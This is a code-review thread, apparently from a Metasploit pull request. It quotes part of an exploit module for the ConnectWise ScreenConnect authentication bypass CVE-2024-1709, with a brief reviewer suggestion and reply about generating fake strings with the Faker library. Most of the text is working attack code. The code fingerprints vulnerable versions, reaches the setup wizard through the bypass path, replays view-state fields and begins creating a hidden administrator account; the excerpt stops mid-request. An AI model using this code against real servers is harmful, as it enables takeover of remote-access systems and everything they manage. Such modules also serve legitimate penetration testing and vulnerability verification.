modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb

```diff
@@ -0,0 +1,427 @@
+      break jumblecase_host_aspx unless jumblecase_host_aspx == host_aspx
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, host_aspx)
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 302 || res.code == 404
+
+    platform = res.code == 302 ? 'Windows' : 'Linux'
+
+    if res.headers.key?('Server') && (res.headers['Server'] =~ %r{ScreenConnect/(\d+\.\d+.\d+)})
+
+      detected = "ConnectWise ScreenConnect #{Regexp.last_match(1)} running on #{platform}."
+
+      if Rex::Version.new(Regexp.last_match(1)) <= Rex::Version.new('23.9.7')
+        return CheckCode::Appears(detected)
+      end
+
+      return CheckCode::Safe(detected)
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    #
+    # 1. Begin the setup wizard using the vulnerability to access the SetupWizard.aspx page.
+    #
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/')
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply when initiating setup wizard.')
+    end
+
+    viewstate, viewstategen = get_viewstate(res)
+    unless viewstate && viewstategen
+      fail_with(Failure::UnexpectedReply, 'Did not locate the view state after initiating setup wizard.')
+    end
+
+    #
+    # 2. Advance to the next step in the setup.
+    #
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),
+      'vars_post' => {
+        '__EVENTTARGET' => '',
+        '__EVENTARGUMENT' => '',
+        '__VIEWSTATE' => viewstate,
+        '__VIEWSTATEGENERATOR' => viewstategen,
+        'ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton' => 'Next'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from first step in setup wizard.')
+    end
+
+    viewstate, viewstategen = get_viewstate(res)
+    unless viewstate && viewstategen
+      fail_with(Failure::UnexpectedReply, 'Did not locate the view after first step in setup wizard.')
+    end
+
+    #
+    # 3. Create a new administrator account.
+    #
+    admin_username = Rex::Text.rand_text_alpha_lower(8)
+    admin_password = Rex::Text.rand_text_alphanumeric(16)
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),
+      'vars_post' => {
+        '__EVENTTARGET' => '',
+        '__EVENTARGUMENT' => '',
+        '__VIEWSTATE' => viewstate,
+        '__VIEWSTATEGENERATOR' => viewstategen,
+        'ctl00$Main$wizard$userNameBox' => admin_username,
+        'ctl00$Main$wizard$emailBox' => "#{admin_username}@#{Rex::Text.rand_text_alpha_lower(8)}.#{Rex::Text.rand_text_alpha_lower(3)}",
```

Comment:
Not a blocker - I'm not sure if we prefer randomizing strings like these or if we'd want to use the `Faker` library. 

I also noticed lower down when you create `manifest_data`, the fields `Name`, `Author` and `Description` all get randomized. We could use the `Faker` library to generate a random name for the `Author` field but seems slightly futile if `Name` and `Description` will both be random. Just thinking out loud. 
```suggestion
        'ctl00$Main$wizard$emailBox' => Faker::Internet.email(name: #{admin_username}),
```

Reply:
I also used the `Faker ` module for the plugin metadata via [ebe6e54](https://github.com/rapid7/metasploit-framework/pull/18870/commits/ebe6e542595040590b3155f65ecce970f3a4ca31) and `Faker::Internet.email`  [f3af183](https://github.com/rapid7/metasploit-framework/pull/18870/commits/f3af1836cecb1a8dd566672475f20fdaca56e1c1)